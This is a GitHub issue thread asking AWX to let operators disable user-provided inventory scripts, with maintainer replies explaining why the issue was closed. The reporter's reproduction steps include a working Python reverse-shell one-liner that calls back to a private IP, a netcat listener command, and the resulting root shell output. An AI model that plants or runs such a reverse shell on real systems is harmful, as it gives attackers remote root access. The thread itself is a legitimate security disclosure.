### ISSUE TITLE
Disable User-Provided Inventory Script Functionality

### ISSUE THREAD

**Issue by tacticalrce** [ansible/awx#2657]
##### ISSUE TYPE
 - Security Feature Request

##### COMPONENT NAME

 - API
 - UI

##### SUMMARY
In multi-tenant/multi-project environments, multiple administrators might have access to the same awx/tower host. The Inventory Script functionality is a known method of executing code and is used by awx-core for inventory management (per #ansible-awx freenode irc).

It would be helpful for more secure environments to differentiate between internal/core inventory scripts and user-provided scripts for the purpose of being able to disable the later.

A simple configuration 'allow_user_inventory_scripts' would be optimal (setting to False would prevent submitting/copying inventory scripts or using them within Inventories ("Custom Script").
This should hold true for UI or API usage.

##### ADDITIONAL INFORMATION
Tested and confirmed in Tower 3.3.1 and AWX 2.1.0.

**Comment by wenottingham** [comment]
What is the issue you are concerned about? We already as far as I know run custom inventory scripts constrained with bubblewrap.

**Comment by tacticalrce** [comment]
I guess it depends on the deployment method. Using the Docker directions (https://github.com/ansible/awx/blob/devel/INSTALL.md#docker-or-docker-compose), it results in a root shell within the awx_task container.

I know it's contained within the docker container, but it would easily allow for the creation of a backdoor within that image or any number of subversive actions for the system. This doesn't seem optimal.

Reproduction steps:
1: Create an inventory script. example data (192.168.188.130 is callback IP, 9999 is callback TCP port)
```
#!/usr/bin/env python
import os
os.system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.188.130",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'')
```
2: Create a new inventory
3: Create a new source for the inventory
4: Choos 'Custom Script' as the source
5: Choose the newly created inventory script
6: Start a listener on the callback server (nc -nvklp 9999)
7: 'SYNC ALL' for the newly created source
8: Check for the shell
```
Listening on [0.0.0.0] (family 0, port 9999)
Connection from [172.17.0.6] port 9999 [tcp/*] accepted (family 2, sport 34006)
sh-4.2# whoami
whoami
root
```

**Comment by wenottingham** [comment]
The process containment we use is disabled for local docker as it cannot work there without it being a privileged container; it is used for openshift/minishift and kubernetes installs.

If the concern is constraining users with the system administrator privilege, the proposed setting would not help; a system admin could still
- disable process containment
- create a new project populated with a playbook that does whatever
- launch it
etc.

**Comment by tacticalrce** [comment]
An application administrator shouldn't by default be able to get shell access to the host itself. Being able to toggle that flag as part of the UI seems like a concern in itself.
Being able to disable user-provided inventory scripts and prevent isolation modifications should only be done via file editing.

**Comment by wenottingham** [comment]
To followup from a side conversation: playbooks can execute shell code on the host itself.
(A trivial example is a `shell` task with `connection: local`). Hence, this is not considered an additional security risk, as the administrative permission to add inventory scripts is explicitly granted.

Long-term, container environments will likely change such that all task execution is outside of the web service container. But that's a ways down the road.

**Comment by wenottingham** [comment]
Closing, no longer relevant with the merge of https://github.com/ansible/awx/pull/9822
